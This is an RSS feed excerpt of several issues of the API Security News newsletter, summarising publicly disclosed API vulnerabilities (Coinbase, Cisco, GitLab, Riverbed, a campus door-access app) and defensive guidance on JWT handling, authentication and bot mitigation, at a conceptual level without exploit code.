					<description><![CDATA[<p>This week, we have an excellent write-up on a case study of API vulnerabilities, an API vulnerability in Riverbed&#8217;s SteelCentral AppInternals software, an article on how even the most &#8220;perfect&#8221; APIs can be abused, and a guide on the safer handling of JSON web tokens (JWTs). Vulnerability: A case study of API vulnerabilities This week, [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-176-case-study-api-vulnerabilities-riverbed-vulnerability-api-abuse-jwt-safety/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-176-case-study-api-vulnerabilities-riverbed-vulnerability-api-abuse-jwt-safety/">Issue 176: Case study of API vulnerabilities, Riverbed vulnerability, API abuse, JWT safety</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have an excellent write-up on a case study of API vulnerabilities, an API vulnerability in Riverbed&#8217;s SteelCentral AppInternals software, an article on how even the most &#8220;perfect&#8221; APIs can be abused, and a guide on the safer handling of JSON web tokens (JWTs).</p>
<h2>Vulnerability: A case study of API vulnerabilities</h2>
<p>This week, a popular article has been <a href="https://monke.ie/api-vulns-casestudy/" target="_blank" rel="noopener noreferrer">the write-up on a series of related API vulnerabilities discovered during a recent assignment </a> by the Irish security researcher <a href="https://twitter.com/pmofcats" target="_blank" rel="noopener noreferrer">@pmofcats</a>. The article is a real eye-opener for API defenders and developers alike to realize how easily their APIs can be compromised by a talented and determined attacker. As the old adage goes: a chain is only as strong as its weakest link, and this write-up shows how easily a system can be compromised totally by relatively minor weaknesses.</p>
<p>The researcher describes a system with three related entities (objects): the <em>grandparent</em>, <em>parent</em>, and <em>child</em>. Using a variety of attack techniques (some directly on the APIs, others by reverse engineering or repositories), the researcher was able to:</p>
<ul>
<li>Get p<em>arent</em> UUIDs leak within API requests.</li>
<li>Reassign roles (such as admin) to a <em>parent</em> if their UUID was known, due to <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">Broken object-level authorization</a>.</li>
<li>Access API keys, administrator details, and so forth because of <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">Broken function-level authorization</a>.</li>
<li>Achieve full account takeover by modifying the <em>child</em> ID within the JWT because of weak JWT validation.</li>
<li>Create arbitrary <em>grandparent</em> entities due to weak policy enforcement.</li>
<li>Leak<em> grandparent</em> IDs both in the commit history in GitHub repository and within JavaScript files in the application.</li>
<li>Access API keys and critical PII exposed through an endpoint that did not validate a <em>parent</em> ID value and used a default production value.</li>
<li>Reuse a web UI cookie on an API endpoint to access high-privilege actions.</li>
</ul>
<p>Thanks to the researcher for sharing, this article shows quite how easily a skilled attacker can use multiple attack vectors on a target.</p>
<h2>Vulnerability: Injection attack in API of the Riverbed software</h2>
<p>This week, The Register has reported on <a href="https://www.theregister.com/2022/03/11/riverbed_vulnerabilities/" target="_blank" rel="noopener noreferrer">vulnerabilities in the API of the SteelCentral AppInternals software by Riverbed</a>. The vulnerabilities were disclosed by cyber security specialist Kang Hao Leng, who made the discovery in November 2021.</p>
<p>The vulnerabilities related to directory traversal in a URL path on API endpoints. A lack of sufficient input validation allowed an attacker to submit deliberately malformed URLs to traverse the target file system — <a href="https://apisecurity.io/encyclopedia/content/owasp/api8-injection" target="_blank" rel="noopener noreferrer">a form of injection attack</a>.</p>
<p>The four critical vulnerabilities are tracked as <a href="https://www.cve.org/CVERecord?id=CVE-2021-42786" rel="nofollow">CVE-2021-42786</a>, <a href="https://www.cve.org/CVERecord?id=CVE-2021-42787" rel="nofollow">CVE-2021-42787</a>, <a href="https://www.cve.org/CVERecord?id=CVE-2021-42853" rel="nofollow">CVE-2021-42853</a>, and <a href="https://www.cve.org/CVERecord?id=CVE-2021-42854" rel="nofollow">CVE-2021-42854</a>. No details on remediation or mitigation for these vulnerabilities were available at the time of writing.</p>
<h2>Article: Even &#8220;perfect&#8221; APIs can be abused</h2>
<p>Dark Reading has featured <a href="https://www.darkreading.com/dr-tech/even-perfect-apis-can-be-abused" target="_blank" rel="noopener noreferrer">thoughts on the abuse of &#8220;perfect&#8221; APIs</a> — even an API that is perfectly secure (or at least does not exhibit obvious vulnerabilities) can still be open to abuse. These so-called abuse attacks can be notoriously hard to detect since they &#8220;hide in plain sight&#8221;, resembling ordinary API usage although with a nefarious purpose.</p>
<p>Two main patterns are associated with API abuse:</p>
<ul>
<li><strong>Using APIs in unintended ways</strong>: Using the API as designed, but for the wrong reason. A typical example is data scraping.</li>
<li><strong>Discovery of vulnerabilities in application logic</strong>: APIs can be automatically abused to detect complex (and hard to spot) vulnerabilities in application logic.</li>
</ul>
<p>The most commonly abused APIs are frequently those of partner APIs — a great example is the Facebook and Cambridge Analytica scandal in 2018. Cambridge Analytica was able to take advantage of a Facebook API and gain access to user information for the purposes of demographic profiling. This was not a vulnerability in the Facebook APIs, but rather the abuse of an API by a bad actor. Not only was this hard to detect, it also proved costly to Facebook, and drew the attention of government regulators.</p>
<p>The article concludes that there is no simple solution to addressing abuse cases, but it recommends beginning with the OWASP API Security Top 10 to eliminate vulnerabilities and then using an attack framework (such as MITRE ATT&amp;CK) to map abuse cases and methods.</p>
<h2>Article: Safer handling of JWTs</h2>
<p>This week&#8217;s final article is courtesy of Alex Savage, with his thoughts on the <a href="https://dev.to/oneadvanced/safely-handling-jwts-5d49" target="_blank" rel="noopener noreferrer">safe handling of JWTs in API backends</a>. The article is a great and quick read for developers tasked with the validation of JWTs: although a seemingly simple task, it is fraught with dangers, and weak JWT is often a source of API vulnerability (as seen in the first vulnerability case this week).</p>
<p>The good news is that relatively simple checklists can be applied to JWT validation. For instance, we recently <a href="https://42crunch.com/7-ways-to-avoid-jwt-pitfalls/" target="_blank" rel="noopener noreferrer">featured a guide</a> on common pitfalls, and this article from Savage suggests the following key points:</p>
<ul>
<li>Pick one (and only one!) algorithm. Typically, RS256 or HS256 are advised.</li>
<li>Use a standard library for decoding and verification, avoid writing your own.</li>
<li>Do not use the token claims until the token is fully verified.</li>
<li>Have a policy for key rotation in place.</li>
</ul>
<p>Definitely an article worth bookmarking for future reference.</p>
<p>The post <a href="https://apisecurity.io/issue-176-case-study-api-vulnerabilities-riverbed-vulnerability-api-abuse-jwt-safety/">Issue 176: Case study of API vulnerabilities, Riverbed vulnerability, API abuse, JWT safety</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 175: Vulnerabilities affecting Cisco platforms, GitLab instances, and campus access control</title>
		<link>https://apisecurity.io/issue-175-vulnerabilities-affecting-cisco-platforms-gitlab-instances-campus-access-control/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 09 Mar 2022 18:16:07 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9243</guid>

					<description><![CDATA[<p>This week, we have three vulnerabilities: the first in the Cisco Expressway Series and TelePresence video communications service, another vulnerability in self-managed GitLab instances, and a bug affecting a campus access control system. On top of this, we also have views on privacy concerns for APIs. Vulnerability: Patches for critical issues in Cisco video communications [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-175-vulnerabilities-affecting-cisco-platforms-gitlab-instances-campus-access-control/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-175-vulnerabilities-affecting-cisco-platforms-gitlab-instances-campus-access-control/">Issue 175: Vulnerabilities affecting Cisco platforms, GitLab instances, and campus access control</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have three vulnerabilities: the first in the Cisco Expressway Series and TelePresence video communications service, another vulnerability in self-managed GitLab instances, and a bug affecting a campus access control system. On top of this, we also have views on privacy concerns for APIs.</p>
<h2>Vulnerability: Patches for critical issues in Cisco video communications services</h2>
<p>This week, <a href="https://thehackernews.com/2022/03/critical-patches-issued-for-cisco.html" target="_blank" rel="noopener noreferrer">Cisco has disclosed two critical flaws</a> affecting their Expressway Series and TelePresence video communications service. The issues are tracked as <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-filewrite-87Q5YRk" target="_blank" rel="noopener noreferrer">CVE-2022-20754 and CVE-2022-20755</a>, both scoring high on CVSS at 9.0.</p>
<p>The first vulnerability allowed an authenticated user with read/write access to perform path traversal attacks using the cluster database API. An attacker could use this vulnerability to overwrite arbitrary files on the operating system potentially leading to device takeover. The vulnerability was caused by a failure to fully validate the input that users supplied to the API — <a href="https://apisecurity.io/encyclopedia/content/owasp/api8-injection" target="_blank" rel="noopener noreferrer">a form of injection attack</a>.</p>
<p>The second vulnerability was a command injection vulnerability on the web-based management interface that allowed authenticated users to perform arbitrary command execution. Again, the root cause is insufficient input validation.</p>
<p>Cisco confirmed that they have no evidence that either vulnerability was exploited on live systems, but have nevertheless advised customers to upgrade their systems to the latest version to minimize the likelihood of any exploit.</p>
<h2>Vulnerability: Security vulnerability in self-managed GitLab instances</h2>
<p>Self-managed versions of the popular CI/CD platform GitLab are vulnerable to attack through a GraphQL API, according to <a href="https://thehackernews.com/2022/03/new-security-vulnerability-affects.html" target="_blank" rel="noopener noreferrer">research published this week in TheHackerNews</a>. The vulnerability is tracked as CVE-2021-4191, with a CVSS score of 5.3.</p>
<p>The vulnerability was discovered and reported by a security researcher at Rapid7, and initially disclosed on 18 February 2021. It has been patched in a recent update from GitLab, and all users on self-managed instances are advised to update their installations as soon as possible.</p>
<p>The vulnerability allowed an unauthenticated user (<a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a>) to access a GraphQL endpoint and collect private information of other registered users, such as names and email addresses. These details could be invaluable to attackers performing initial reconnaissance of installations, leading to brute-forcing or guessing of passwords.</p>
<p>Estimates suggest that a large number of GitLab installations could be affected by this vulnerability.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9253" src="https://apisecurity.io/wp-content/uploads/2022/03/Article2.jpg" alt="" width="608" height="323" /></p>
<h2>Vulnerability: Security bug affects campus access control system</h2>
<p>The third and final vulnerability this week affects an access control system for a campus: <a href="https://techcrunch.com/2022/03/03/cbord-university-digital-locks/" target="_blank" rel="noopener noreferrer">a curious user discovered that the backend API of the mobile application did not authenticate users</a> (another case of  <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a>). Effectively, this vulnerability gave an attacker a &#8220;master key&#8221; to all doors controlled by the system.</p>
<p>University student Erik Johnson had become frustrated at the poor performance of the GET Mobile application that controlled access to campus buildings, and used elementary network monitoring to understand the behavior of the application. He discovered that he had to submit location coordinates to validate proximity with the targeted door, but this could easily be spoofed through an API.</p>
<p>Johnson then made a startling observation: the API endpoints did not actually validate a student&#8217;s credentials. This meant that anyone who knew easily available identifiers (like student IDs, usernames, or email addresses) could access the target&#8217;s account, which together with the ability to unlock doors at known locations resulted in a digital &#8220;master key&#8221;.</p>
<p>Johnson attempted to report the vulnerability to the solution developer CBORD, but hit a wall there so resorted to disclosure through TechCrunch. Reports suggest the same company has been affected by a similar vulnerability in 2009.</p>
<p>This vulnerability has since been acknowledged and fixed by CBORD, who has also revoked all session keys of affected systems. It is unknown whether the bug was exploited for any malicious access, or whether users have been informed of the issue.</p>
<h2>Article: Privacy becomes an increasing concern for APIs</h2>
<p>Finally this week we feature <a href="https://thenewstack.io/privacy-gains-prominence-as-an-api-security-concern/" target="_blank" rel="noopener noreferrer">an article highlighting the growing concerns on data privacy in relation to APIs</a>. The principal function of an API is as a conduit for data. With increasing connectivity and API growth, APIs are becoming the number one attack vector for information breaches.</p>
<p>The underlying causes of information breaches in APIs include, for example:</p>
<ul>
<li>Broken or missing user authentication (this week we featured two instances of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a>)</li>
<li>Poorly implement access controls, either at the function or object level</li>
<li>Incomplete inventory or asset management</li>
<li>Failures in data classification and access controls</li>
<li>Poor governance</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-175-vulnerabilities-affecting-cisco-platforms-gitlab-instances-campus-access-control/">Issue 175: Vulnerabilities affecting Cisco platforms, GitLab instances, and campus access control</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Webinar: How to Extend Protection of your Data from API to Mobile Application</title>
		<link>https://apisecurity.io/webinar-extend-protection-data-api-mobile-application/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 03 Mar 2022 10:28:21 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9236</guid>

					<description><![CDATA[<p>APIs are mobile app developer&#8217;s best friends as they help reduce development time and save costs. But the rapid deployment of mobile apps and the explosion in the development of new APIs present very real threats for most organizations. To defend your APIs, it is important to have a comprehensive approach to API security from [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/webinar-extend-protection-data-api-mobile-application/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/webinar-extend-protection-data-api-mobile-application/">Webinar: How to Extend Protection of your Data from API to Mobile Application</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://42crunch.com/extend-protection-of-your-data-from-api-to-mobile-application/"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-9187" src="https://apisecurity.io/wp-content/uploads/2022/02/Article5.jpg" alt="" width="1391" height="609" /></a></p>
<p class="mt-4 mb-4 grey-out">APIs are mobile app developer&#8217;s best friends as they help reduce development time and save costs. But the rapid deployment of mobile apps and the explosion in the development of new APIs present very real threats for most organizations.</p>
<p class="mt-4 mb-4 grey-out">To defend your APIs, it is important to have a comprehensive approach to API security from design through to production.</p>
<p class="mt-4 mb-4 grey-out">This webinar presents the new integration of 42Crunch with comprehensive mobile app protection from Approov.</p>
<p class="mt-4 mb-4 grey-out">The result: A joint solution that delivers shift-left API protection as well as run-time shielding that extends all the way to your mobile apps and the environments they run in.</p>
<p class="mt-4 mb-4 grey-out">In this webinar, we will present</p>
<ul class="mt-4 mb-4 grey-out">
<li>The threat to APIs posed by mobile apps.</li>
<li>How Approov shields mobile apps from cloning and modification and defends against manipulation of the client environment.</li>
<li>How these checks can be seamlessly integrated into the 42Crunch API security platform to provide visibility and protection all the way to the API backend using a “security as code” approach.</li>
<li>The benefits of the unified API protection offered by the joint 42Crunch / Approov solution.</li>
<li>A demonstration of the integrated solution in action.</li>
</ul>
<p><a href="https://42crunch.com/extend-protection-of-your-data-from-api-to-mobile-application/">Register</a></p>
<p><strong>Speakers </strong></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9239" src="https://apisecurity.io/wp-content/uploads/2022/03/42C_Approov_Webinar_Speaker2_EmailTemplate.png" alt="" width="300" height="132" /><img loading="lazy" decoding="async" class="alignnone wp-image-9238" src="https://apisecurity.io/wp-content/uploads/2022/03/42C_Approov_Webinar_Speaker1_EmailTemplate.png" alt="" width="300" height="132" /></p>
<p><a href="https://42crunch.com/extend-protection-of-your-data-from-api-to-mobile-application/">Register</a></p>
<p>The post <a href="https://apisecurity.io/webinar-extend-protection-data-api-mobile-application/">Webinar: How to Extend Protection of your Data from API to Mobile Application</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 174: APIs increasingly used for account takeover, API hacking book, OAuth in Postman</title>
		<link>https://apisecurity.io/issue-174-apis-increasingly-used-for-account-takeover-api-hacking-book-oauth-in-postman/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 02 Mar 2022 21:13:25 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9207</guid>

					<description><![CDATA[<p>This week, we have new research in APIs that reveals how they are increasingly used for account takeover, a look at a great new book on hacking APIs, an article on using Postman for OAuth 2.0 authorization code grants, and a guide on documenting APIs. Article: APIs increasingly used for account takeover New research covered [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-174-apis-increasingly-used-for-account-takeover-api-hacking-book-oauth-in-postman/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-174-apis-increasingly-used-for-account-takeover-api-hacking-book-oauth-in-postman/">Issue 174: APIs increasingly used for account takeover, API hacking book, OAuth in Postman</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have new research in APIs that reveals how they are increasingly used for account takeover, a look at a great new book on hacking APIs, an article on using Postman for OAuth 2.0 authorization code grants, and a guide on documenting APIs.</p>
<h2>Article: APIs increasingly used for account takeover</h2>
<p><a href="https://securityboulevard.com/2022/02/new-api-research-shows-62-growth-in-atos-targeting-login-apis/" target="_blank" rel="noopener noreferrer">New research covered by Security Boulevard</a> reveals how APIs are increasingly favored by developers: they are becoming the development tool of choice, with data indicating that of the 21.1 billion application requests analyzed, nearly 70% of them were API-based.</p>
<p>Unfortunately, APIs are also the favorite attack vector for adversaries: correspondingly, the data indicated that 80% of blocked attacks were targeting APIs. In particular, the research revealed a 62% increase in account takeovers (ATO) using login APIs. Most notably, the attacks increasingly focused on account logins and registrations. Common examples were attacks against gift card sites, such as card and points theft, and semi-automated large-scale attacks against loan sites.</p>
<p>The report also revealed a 178% increase in API-based content scraping. Although apparently benign, large-scale content scraping can lead to revenue loss for the organizations that own that data. Typical examples of data scraping included inventory pricing, stock levels, market data, and social media data.</p>
<p>An interesting observation made in the article is that well-documented and discoverable APIs (either by virtue of OpenAPI definitions or GraphQL endpoints) can actually facilitate attacks. No longer do attackers have to enumerate API endpoints, but instead can easily leverage the definitions. However, this does not definitely mean that APIs should not be documented, but perhaps some consideration is needed on the intended (and unintended) audience and how exactly to reach them.</p>
<p>The article provides the following sound recommendations for improving API security:</p>
<ul>
<li><strong>API discovery and inventory tracking</strong>: Ensure that your organization maintains an accurate inventory of APIs to avoid exposing unnecessary attack surface, and make sure all APIs have assigned owners.</li>
<li><strong>API risk assessment and remediation</strong>: Assess APIs for common weaknesses and drive remediating or mitigating vulnerabilities.</li>
<li><strong>Native, inline protection for attacks and vulnerability exploits</strong>: Use a defense-in-depth approach by leveraging API firewalls and gateways for inline protection.</li>
</ul>
<h2>Review: &#8220;Hacking APIs&#8221; by Corey Ball</h2>
<p>My last few evenings have been spent reading &#8220;Hacking APIs&#8221; by Corey Ball, <a href="https://nostarch.com/hacking-apis" target="_blank" rel="noopener noreferrer">available now as early access form from NoStarch Press</a>. I have no doubt this book is destined to become the industry handbook for API security aficionados in years to come, and would recommend this to readers of this newsletter regardless of experience.</p>
<p>The book tackles a broad topic primarily from the perspective of a pentester but makes few assumptions on prior knowledge. I certainly learned a great deal about API discovery, bug bounty programs, and disclosure. The chapters on how to evade standard controls and countermeasures were particularly interesting — for defenders, this should prove quite eye-opening indeed!</p>
<p>On a personal level, I found myself inspired to get a lot more hands-on with APIs, hopefully there is a disclosure with my name on it soon.</p>
<p>Thanks to Corey for the great work and contribution to the community. Highly recommended.</p>
<h2>Guide: Using Postman for OAuth 2.0 authorization code grants</h2>
<p>Following on from the popular best practice for API authentication and authorization <a href="https://apisecurity.io/issue-173-coinbase-vulnerability-authn-authz-best-practices-bad-bots-hack-elgato-key-light/" target="_blank" rel="noopener noreferrer">featured last week</a>, we have <a href="https://dev.to/oneadvanced/oauth-20-authorization-code-grant-with-postman-part-1-5238" target="_blank" rel="noopener noreferrer">a quick guide on how to use Postman</a> to implement the OAuth 2.0 authorization code grant flow.</p>
<p>The guide describes how to use Postman acting as a client to obtain an authorization code, and how then to use the code to gain access and refresh tokens. The popular Keycloak server acts as the authorization server in this example.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9215" src="https://apisecurity.io/wp-content/uploads/2022/03/Article3.jpg" alt="" width="602" height="317" /></p>
<p>This is a great guide to help developers understand this important OAuth 2.0 flow in a very hands-on manner, and I look forward to the next article describing the PKCE extension to this flow.</p>
<h2>Guide: Comprehensive guide to API documentation</h2>
<p>Good API documentation is essential in enabling downstream API consumption by end users. Well-documented APIs also enable effective security implementations: for example, illustrative code samples and associated documentation can guide end-users to correctly implement authentication workflows.</p>
<p>I&#8217;ve found myself frequently referring to <a href="https://idratherbewriting.com/learnapidoc/" target="_blank" rel="noopener noreferrer">the excellent and comprehensive guide</a> by Tom Johnson on a variety of API documentation topics. This is worth bookmarking for anyone engaged in writing or documenting APIs.</p>
<h2>Webinar: Protection of your data from API to mobile application</h2>
<p>Finally, a reminder that on Tuesday, 8 March at 11 AM (EST) / 4 PM (GMT), I am joined by David Stewart, CEO of Approov. We discuss an approach to how to provide shift-left API protection as well as runtime shielding that extends all the way to your mobile apps and the environments they run in.</p>
<p>In <a href="https://42crunch.com/extend-protection-of-your-data-from-api-to-mobile-application/" target="_blank" rel="noopener noreferrer">this webinar</a>, we will present:</p>
<ul>
<li>The threat to APIs posed by mobile apps.</li>
<li>How Approov shields mobile apps from cloning and modification and defends against manipulation of the client environment.</li>
<li>How these checks can be seamlessly integrated into 42Crunch API Security Platform to provide visibility and protection all the way to the API backend by using a “security as code” approach.</li>
<li>The benefits of the unified API protection offered by the joint 42Crunch/Approov solution.</li>
<li>A demonstration of the integrated solution in action.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-174-apis-increasingly-used-for-account-takeover-api-hacking-book-oauth-in-postman/">Issue 174: APIs increasingly used for account takeover, API hacking book, OAuth in Postman</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 173: Coinbase vulnerability, AuthN/AuthZ best practices, bad bots, Elgato Key light hack</title>
		<link>https://apisecurity.io/issue-173-coinbase-vulnerability-authn-authz-best-practices-bad-bots-hack-elgato-key-light/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 23 Feb 2022 19:23:29 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9172</guid>

					<description><![CDATA[<p>This week, we have news of the eye-opening vulnerability on the Coinbase platform which netted $250,000 in bug bounty. There&#8217;s also an excellent guide on best practices for authentication and authorization for REST APIs, an article on the growth of bad bots and how to mitigate against them, and a fun read from APIHandyman on [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-173-coinbase-vulnerability-authn-authz-best-practices-bad-bots-hack-elgato-key-light/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-173-coinbase-vulnerability-authn-authz-best-practices-bad-bots-hack-elgato-key-light/">Issue 173: Coinbase vulnerability, AuthN/AuthZ best practices, bad bots, Elgato Key light hack</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of the eye-opening vulnerability on the Coinbase platform which netted $250,000 in bug bounty. There&#8217;s also an excellent guide on best practices for authentication and authorization for REST APIs, an article on the growth of bad bots and how to mitigate against them, and a fun read from APIHandyman on how to hack the Elgato Key light API.<cite></cite></p>
<h2>Vulnerability: Coinbase API bug allowed unlimited cryptocurrency trading</h2>
<p>This week&#8217;s major news story has been the disclosure of <a href="https://blog.coinbase.com/retrospective-recent-coinbase-bug-bounty-award-9f127e04f060" target="_blank" rel="noopener noreferrer">a major vulnerability in an API on Coinbase</a>, a cryptocurrency trading platform. This vulnerability potentially allowed an attacker to make unlimited cryptocurrency trades between different currency accounts.</p>
<p>The vulnerability is a rather epic example of<a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer"> API1:2019 — Broken object level authorization.</a> To exploit the vulnerability, attackers needed two different cryptocurrency accounts and a modest balance in one account. Attackers could initiate a market order using the account with funds as the source account, but then could modify the API request to specify the other account with low balance. Unfortunately, the Coinbase validation logic did not verify the source account properly and processed the trade normally. Thus, the attacker could complete the trade using cryptocurrency they did not in fact have.</p>
<p>The security researcher initially <a href="https://twitter.com/Tree_of_Alpha/status/1495014902582362112" target="_blank" rel="noopener noreferrer">took to Twitter to publicize</a> the potential issue to get in contact with the relevant security team at Coinbase. Once alerted, the response from Coinbase was exemplary, resulting in a complete resolution within 6 hours, and earning the security researcher a record $250,000 bounty. Coinbase themselves has covered the issue in their security blog, where they also describe additional compensating controls that would have reduced the impact.</p>
<h2>Guide: Best practices for API authentication and authorization</h2>
<p>At 42Crunch, we recently featured a <a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/" target="_blank" rel="noopener noreferrer">webinar focused on API authentication and authorization</a>, an evergreen hot topic for API developers and security teams. This week, <a href="https://stackoverflow.blog/2021/10/06/best-practices-for-authentication-and-authorization-for-rest-apis/" target="_blank" rel="noopener noreferrer">we have an excellent concise guide</a> on this topic, courtesy of StackOverflow.</p>
<p>The key takeaways from the guide include the following:</p>
<ul>
<li><strong>Always use TLS</strong>: Every API should use TLS (Transport Layer Security) without exception to prevent data leaks. Whilst this introduces complexities in certificate management, modern platforms are moving to integrate certificate solutions to ease adoption.</li>
<li><strong>Use OAuth2 for single sign-on (SSO)</strong>: OAuth2 has established itself as the <em>de facto</em> standard for authorization in SSO, with industry-standard providers like Google, GitHub, Microsoft, etc. By using OAuth2, developers can adopt standard flows for authentication well-designed to avoid common implementation errors, particularly if they also adopt standard OAuth libraries for their language/framework.</li>
<li><strong>Use API keys to give existing users programmatic access</strong>: For internal users with known identity, API keys can be used to simplify access to APIs without the complexity of OAuth2, as long as the keys are managed securely.</li>
<li><strong>Encourage using good secrets management for API keys</strong>: Do not commit any API keys to source code repositories — if necessary, use a secrets management solution.</li>
<li><strong>Choose when to enforce authorization with request-level authorization</strong>: Use authorization middleware to standardize access control and avoid broken function-level authorization vulnerabilities.</li>
<li><strong>Configure different permissions for different API keys</strong>: Be sure to use granular permissions on API keys to avoid giving unnecessary or unintended access.</li>
<li><strong>Leave the rest of the authorization to the app or business logic</strong>: If your application has particularly complex authorization requirements, consider using a standard library, such as <a href="https://www.osohq.com/" target="_blank" rel="noopener noreferrer">OSOHq</a>.</li>
</ul>
<p>The single most important lesson worth repeating here for a developer is to leverage the power of standard libraries and frameworks as much as possible, not re-invent the wheel.</p>
<h2>Article: The rise of bad bots and how to mitigate against them</h2>
<p>NordicAPIs has contributed an <a href="https://nordicapis.com/bad-bots-and-the-dark-side-of-apis/" target="_blank" rel="noopener noreferrer">interesting article on the rise of bad bots and how these are impacting APIs</a>.</p>
<p>The article sheds light onto how &#8220;sneaker bots&#8221; (because they automated the online purchase of sneakers on websites) were born, how they evolved to scrape Twitter accounts to gain access to market news a fraction before human users, and how they process this information.</p>
<p>From an adversarial viewpoint, the ability to automate API access facilitates easy attacks and the subsequent exfiltration of data once a vulnerability is discovered. To counteract this, the authors suggest several mitigation strategies against bots:</p>
<ul>
<li>Catch bad actors when they’re still in the reconnaissance stage.</li>
<li>Establish baseline for human use of APIs.</li>
<li>Use an API gateway for rate limiting and to ban requests.</li>
<li>Have perimeter-level security beyond a gateway.</li>
<li>Avoid misconfigured APIs.</li>
<li>Make sure your authentication controls are up to scratch and limit access to potentially sensitive data wherever possible.</li>
</ul>
<h2>Article: How to reverse engineer and hack the Elgato Key light API</h2>
<p>As a little self-indulgence (I&#8217;m an owner of an Elgato Key light) this week, we have <a href="https://apihandyman.io/hacking-elgato-key-light-with-postman/" target="_blank" rel="noopener noreferrer">a great write-up</a> from the APIHandyman on hacking the Key light internal API. The article describes how to use the proxy feature in Postman to capture requests from the Elgato desktop application to the Key light. The author then demonstrates how the API can be enumerated using standard light operations.</p>
<p>Finally, the author makes some observations on the quality of the API design including:</p>
<ul>
<li>Values for light on/off were non-human readable values, prefer the use of &#8220;on&#8221; and &#8220;off&#8221;.</li>
<li>The brightness value did not seem to validate a minimum value, instead allowing zero as a valid value.</li>
<li>For brightness values out of range (like 110%), a <code>HTTP 200 OK</code> code was returned rather than an error code as might be expected.</li>
<li>The color temperate values did not map to the Kelvin values on the UI, meaning that the user had to guess how the Kelvin value was derived internally.</li>
</ul>
<p>All in all, a fun write-up showing some great Postman techniques and API design tips.</p>
<h1>Webinar: Protection of your data from API to mobile application</h1>
<p>On Tuesday, 8 March at 11 AM (EST) / 4 PM (GMT), I am joined by David Stewart, CEO of Approov. We discuss an approach to how to provide shift-left API protection as well as runtime shielding that extends all the way to your mobile apps and the environments they run in.</p>
<p>In <a href="https://42crunch.com/extend-protection-of-your-data-from-api-to-mobile-application/" target="_blank" rel="noopener noreferrer">this webinar</a>, we will present:</p>
<ul>
<li>The threat to APIs posed by mobile apps.</li>
<li>How Approov shields mobile apps from cloning and modification, and defends against manipulation of the client environment.</li>
<li>How these checks can be seamlessly integrated into 42Crunch API Security Platform to provide visibility and protection all the way to the API backend by using a “security as code” approach.</li>
<li>The benefits of the unified API protection offered by the joint 42Crunch/Approov solution.</li>
<li>A demonstration of the integrated solution in action.</li>
</ul>
<p><a href="https://42crunch.com/extend-protection-of-your-data-from-api-to-mobile-application"><img loading="lazy" decoding="async" class="alignnone wp-image-9187" src="https://apisecurity.io/wp-content/uploads/2022/02/Article5.jpg" alt="" width="605" height="265" /></a></p>
